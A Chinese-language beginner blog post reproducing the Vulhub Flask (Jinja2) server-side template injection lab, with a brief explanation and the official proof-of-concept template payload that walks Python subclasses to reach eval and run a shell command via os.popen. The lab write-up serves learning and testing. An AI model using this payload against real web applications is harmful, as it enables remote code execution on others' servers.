Vulnhub flask(SSTI)漏洞复现

最新推荐文章于 2024-02-18 18:50:05 发布
最新推荐文章于 2024-02-18 18:50:05 发布
阅读量292 收藏 1
点赞数 1
文章标签: flask 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69209270/article/details/133216773
版权

一、原理:

第一次做博客,不会做请见谅,其实也是为了方便自己复习和学习,如果有哪里做的不好或者有好的建议,请纠正我,谢谢~

网页使用了python中的flask模块,其中template没有经过任何过滤或识别直接渲染,导致任意命令执行漏洞。

二、漏洞复现

环境搭建:docker-compose up -d

源码可以知道,需要提交的参数为name,所以使用name尝试是否有ssti漏洞

直接传参abc发现直接输出

尝试执行4*4,发现可以获得计算后的结果,自此说明有漏洞

除此之外还可以尝试其他的ssti漏洞命令,查看基类(我这边只能源码看到,外面显示不出来头疼,果然还是太菜啦,得多学学)

官方poc:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

讲解:

catch_warnings模块来捕获和处理与模板注入相关的警告消息,大概意思就是从警告信息中查找是否有eval(执行代码)的函数,如果有可以直接用

endif和endfor是是来控制模板输出,也是靠它来结束语句的

其他的应该都是比较容易明白的,如果不太明白

执行成功,除此之外还可以尝试其他命令执行

自此漏洞复现结束

三、参考链接

https://www.cnblogs.com/Rasang/p/12181654.htmlPython——flask漏洞探究

从零学习flask模板注入-网盾安全培训

菜鸡努力学习
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Flask(Jinja2) 服务端模板注入漏洞
浅笑996的博客
12-11 1301
原理 参考文章: https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf http://rickgray.me/use-python-features-to-execute-arbitrary-codes-i...
Vulhub Flask SSTI漏洞
CyhDl666的博客
03-26 986
文章目录环境搭建漏洞python3python2CTFSHOWWEB361WEB362WEB363 环境搭建 首先利用docker搭建好环境 docker-compose up -d docker ps查看搭建的端口:8000 漏洞 开始 flask-ssti漏洞以前有总结过 整理的不够好 今天重新整理一下 题目源码 from flask import Flask, request from jinja2 import Template app = Flask(__name__)
vulhub漏洞十五_flask
weixin_44193247的博客
01-26 1283
vulhub漏洞练习篇
SSTI模板注入漏洞(vulhub )
weixin_74790320的博客
02-18 1294
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,,模板引擎会提供一套生成html代码的程序,,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈在用户面前。模板引擎也会提供沙,但是可以用简而言之我的理解是模板引擎的关键就是只需要用户提供数据给模板便可以生成前端html页面,模板引擎有一定的防范机制,但是可以利用一定技术去绕过破解。
Flask(Jinja2)服务端模板注入漏洞——vulhub/flack/ssti
Stephen Wolf
10-31 1511
一、服务端模板注入漏洞 简述: 服务器模板注入 (SSTI ) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI 攻击可以用来找出 Web 应用程序的内容结构。 二、利用搭的vulhub靶机漏洞 1、service docker start //进入虚拟机后开启docker服...
Flask SSTI/沙箱逃逸的一些总结
01-20
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ...
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过》 SSTI,即Server-Side Template Injection,是针对服务器端模板引擎的一种安全漏洞,允许攻击者通过注入恶意代码来控制模板渲染过程,从而获取敏感信息或...
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
09-20
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
基于PythonFlaskWeb版网站sqlxss漏洞扫描框架 html + flask + python + mysql
最新发布
05-27
基于PythonFlaskWeb版网站sqlxss漏洞扫描 框架 html + flask + python + mysql + orm +dvwa+sqllabs+pikachu dvwa config\config.inc.php.bak to config.inc.php $_DVWA[ 'db_server' ] = getenv('DB_SERVER') ?: ...
安全开发Python网页OA系统POC漏洞检测系统,框架FLask + python + OAPOC payload
07-19
Python网页OA系统POC漏洞检测系统 框架FLask + python + OAPOC payload 角色介绍 管理员 admin 123456 模块介绍 登录模块 首页模块 OA安全检测子模块(支持多个url或者单个url检测,调用payload并在界面回馈检测...
flask ssti漏洞
yougexiaojiuguan的博客
11-20 131
记录漏洞过程
[python]浅谈FlaskSSTI漏洞
记录学习,一起进步
04-03 1235
[python]浅谈FlaskSSTI漏洞
Flask (Jinja2) 服务端模板注入漏洞
来日可期的博客
10-15 1043
在模板引擎中,开发者可以使用特定的语法将数据与模板结合生成最终的输出。然而,如果在这个过程中,直接使用用户提供的数据而没有进行适当的过滤或转义,攻击者就可以注入恶意模板代码。攻击者可以构造恶意的输入,在用户输入中包含模板标记(如 `{{}}`),以控制模板引擎的行为。模板引擎会将用户提供的数据作为代码来执行,导致恶意代码执行在服务端上下文中
Weblogic系列漏洞——vulhub
qq_45612828的博客
08-08 1977
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271) Weblogic 任意文件上传漏洞(CVE-2018-2894) Weblogic Pre-Auth 远程命令执行(CVE-2020-14882、CVE-2020-14883) Weblogic ssrf(CVE-2014-4210)......
Flask(Jinja2)服务端模板注入漏洞SSTI)整理
qq_46145027的博客
04-19 1313
整理一下Flask框架下的SSTI漏洞相关知识
Python——flask漏洞探究总结(持续更新)
kuller_Yan的博客
04-08 2700
通过python的对象的继承来一步步实文件读取和命令执行的的。 流程: 找到父类<type ‘object’>–>寻找子类–>找关于命令执行或者文件操作的模块。 几个魔术方法: __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base...
Flask框架远程命令执行-学习笔记
小龙在线
08-17 816
实验介绍 #coding=UTF-8 from flask import Flask, request, render_template_string, render_template import os import string app = Flask(__name__) @app.route('/news/') def news(): user = {'id':"admin", 'password':"admin888"} if request.args.get('id'):
SSTI简单总结和例题
Aiwin的博客
07-21 2640
SSTI简单总结和例题CISCN 2019华东南]Double Secret和[护网杯 2018]easy_tornado
Flask SSTI漏洞介绍及利用
JCPS_Y的博客
10-23 2658
Flask SSTI漏洞介绍及利用
flask ssti
09-26
Flask SSTI(Server-Side Template Injection)是指在Flask应用中,由于未正确处理用户输入,导致用户输入的模板言被当作代码执行的漏洞。攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值